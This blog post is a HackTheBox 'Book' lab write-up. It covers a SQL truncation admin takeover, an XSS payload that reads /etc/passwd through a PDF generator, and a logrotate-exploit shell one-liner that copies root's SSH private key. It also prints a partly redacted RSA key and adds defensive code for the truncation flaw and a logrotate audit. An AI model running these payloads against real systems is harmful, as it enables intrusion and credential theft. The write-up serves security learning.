HackTheBox Book Writeup – 10.10.10.176

Hello and welcome back. Today I’m doing a writeup of the HackTheBox Book machine (10.10.10.176). Book is a medium-difficulty Linux machine released by HackTheBox a couple of weeks ago. The box is built around a number of vulnerabilities: SQL injection, a SQL truncation attack, local file read via XSS, a logrotate exploit, and so on.

Let’s begin.

NMAP SCAN

As always, I added the machine IP 10.10.10.176 to my hosts file as book.htb and began the nmap scan. Since it is a Linux machine, I decided to go with a detailed scan. The scan revealed only two open ports: SSH (22/tcp) and HTTP (80/tcp).

# root @ ns09 in ~/htb/book [9:31:03] 
$ cat book.nmap
# Nmap 7.80 scan initiated Wed Feb 26 09:51:27 2020 as: nmap -T4 -A -sT -oA book book.htb
Nmap scan report for book.htb (10.10.10.176)
Host is up (0.13s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/26%OT=22%CT=1%CU=39553%PV=Y%DS=2%DC=T%G=Y%TM=5E56159
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   124.29 ms 10.10.14.1
2   124.79 ms book.htb (10.10.10.176)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 26 09:52:11 2020 -- 1 IP address (1 host up) scanned in 44.76 seconds

Visiting the webpage, it shows a library website with a login page and a sign-up page. At this point it looks like

After a little enumeration I found the following directories and files.

Dir found: / - 200
Dir found: /admin/ - 200
File found: /index.php - 200
File found: /admin/index.php - 200
File found: /db.php - 200

I decided to create a user for myself and log in.

After logging in I noticed that the files and directories found above are only accessible to “admin”. So I headed back to the sign-up page and tried to register as “admin”, but that user already exists.

After picking up tips from various HTB forums, I understood that a SQL truncation attack would work against the admin user. I managed to gain admin privileges and access to the admin page as follows:

I captured the sign-up request with Burp and modified it as shown in the screenshot below. My payload padded the field with spaces and ended with 11 to complete the SQL truncation attack. Burp showed a 302 Found response after I sent the modified request. I then stopped intercepting, logged in with admin@book.htb and the password adminadmin I had just created, and I was in.

[Screenshot: Bypassing admin credentials]
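To show why the padded sign-up above produced a second usable “admin” row, here is an added model of the flaw (not the box’s PHP code): it assumes a VARCHAR(20) e-mail column on a non-strict MySQL server with a PAD SPACE collation, and puts the hardened registration check next to the vulnerable one.

```python
# Model of the SQL truncation flaw used for the admin takeover above. This is a
# constructed example, not the box's PHP code: it assumes a VARCHAR(20) e-mail
# column on a MySQL server in non-strict mode (over-long values are silently cut
# to the column width) with a PAD SPACE collation (trailing spaces are ignored
# when two strings are compared).
from dataclasses import dataclass, field

EMAIL_WIDTH = 20  # assumed column width; the real schema is not on the page


def _pad_space_equal(a: str, b: str) -> bool:
    """PAD SPACE comparison: 'admin@book.htb      ' == 'admin@book.htb'."""
    return a.rstrip(" ") == b.rstrip(" ")


@dataclass
class NonStrictUsers:
    """A users table behaving like non-strict MySQL."""
    rows: list = field(default_factory=list)  # (email, password)

    def exists(self, email: str) -> bool:
        return any(_pad_space_equal(r[0], email) for r in self.rows)

    def insert(self, email: str, password: str) -> None:
        self.rows.append((email[:EMAIL_WIDTH], password))  # silent truncation

    def login(self, email: str, password: str) -> bool:
        # SELECT ... WHERE email=? AND password=?; any matching row signs in
        return any(_pad_space_equal(r[0], email) and r[1] == password
                   for r in self.rows)


def vulnerable_signup(db: NonStrictUsers, email: str, password: str) -> bool:
    """Checks the raw submitted value, then stores the truncated one."""
    if db.exists(email):
        return False
    db.insert(email, password)
    return True


def hardened_signup(db: NonStrictUsers, email: str, password: str) -> bool:
    """Normalise and length-check first, so the value that is checked for
    uniqueness is exactly the value that will be stored."""
    email = email.strip()
    if len(email) > EMAIL_WIDTH or db.exists(email):
        return False
    db.insert(email, password)
    return True
```

On a real deployment the same fix is enforced server-side with STRICT_TRANS_TABLES (so an over-long INSERT fails instead of truncating) and a UNIQUE index on the column.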

The admin is able to upload a PDF from the collections page. Posts on the HTB forums suggest that the admin can upload a PDF with an embedded PHP reverse shell.

A quick Google search led me to this website: https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html “Local File Read via XSS in Dynamically Generated PDF”. Using the technique described there, it is possible to read local files via XSS in the PDF generator.

The Payload:

<script>
  // fetch a file from the host that renders the PDF and write it into the page
  x = new XMLHttpRequest;
  x.onload = function () {
    document.write(this.responseText);
  };
  x.open("GET", "file:///etc/passwd");
  x.send();
</script>

I inserted the above code in the author field and uploaded a blank PDF. When I opened the generated PDF from the collections menu, /etc/passwd was displayed.

User.txt

In the same way, I was able to read the RSA private key:

-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA2JJQsccK6fE05OWbVGOuKZdf0FyicoUrrm821nHygmLgWSpJ
G8m6UNZyRGj77eeYGe/7YIQYPATNLSOpQIue3knhDiEsfR99rMg7FRnVCpiHPpJ0
-----------------------------[SNIP]----------------------
nkeaf9obYKsrORVuKKVNFzrWeXcVx+oG3NisSABIprhDfKUSbHzLIR4=
-----END RSA PRIVATE KEY-----

I copied the private key into my .ssh folder and fixed its permissions. Then I used it to SSH in as the user “reader” found in the /etc/passwd output and grabbed the user flag.

[Screenshot: user.txt]

Straight To The Root

After enumerating the running processes I noticed that logrotate is running. logrotate is the standard Linux log rotation utility, and a known exploit for it exists: https://github.com/whotwagner/logrotten

Based on the above exploit, I created a payload to retrieve root’s RSA private key.

echo 'if [ "$(id -u)" -eq 0 ]; then (cat /root/.ssh/id_rsa >> /key.txt &); fi' > payloadfile

I ran the exploit and obtained root’s private key, copied it to my Kali machine, and used it to SSH in as root.
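From the defender’s side, the precondition logrotten relies on is checkable. Here is an added audit helper (not part of the writeup or of logrotten) that parses logrotate stanza headers and flags rotated logs whose parent directory is writable by someone other than the account running logrotate; the config and directories it checks are constructed.

```python
# Audit helper for the logrotate weakness described above (added example; not
# part of the writeup or of logrotten). The logrotten race needs a rotated log
# whose *directory* is writable by a user other than the one logrotate runs as
# (root on a default install). Paths and config below are constructed.
import os
import re
import stat
import tempfile

# header of a stanza: one or more paths, then "{" (globs are kept verbatim)
_STANZA = re.compile(r"^\s*((?:/\S+\s*)+)\{", re.M)


def rotated_paths(config_text: str) -> list:
    """Every log path named in a stanza header of a logrotate config."""
    paths = []
    for m in _STANZA.finditer(config_text):
        paths.extend(m.group(1).split())
    return paths


def risky_directories(paths, rotator_uid: int = 0) -> dict:
    """Map each log whose parent dir others than rotator_uid can write to a reason."""
    findings = {}
    for p in paths:
        d = os.path.dirname(p)
        try:
            st = os.stat(d)
        except FileNotFoundError:
            continue  # nothing to rotate yet; skip rather than guess
        if st.st_uid != rotator_uid:
            findings[p] = f"{d} owned by uid {st.st_uid}, not {rotator_uid}"
        elif st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
            findings[p] = f"{d} is world-writable without the sticky bit"
        elif st.st_mode & stat.S_IWGRP:
            findings[p] = f"{d} is group-writable (gid {st.st_gid})"
    return findings


def demo() -> dict:
    """Constructed config and directories so the check runs offline."""
    base = tempfile.mkdtemp()
    safe, weak = os.path.join(base, "var_log"), os.path.join(base, "user_logs")
    os.mkdir(safe, 0o755)
    os.mkdir(weak)
    os.chmod(weak, 0o777)  # anyone may replace files in here
    cfg = f"{safe}/syslog {{\n  weekly\n}}\n{weak}/access.log {{\n  daily\n}}\n"
    # the current user stands in for root as the account running logrotate
    return risky_directories(rotated_paths(cfg), rotator_uid=os.geteuid())
```

Run against /etc/logrotate.conf and the files under /etc/logrotate.d with rotator_uid=0, any finding is a directory whose owner could stage the race the writeup uses.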

That’s it, thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
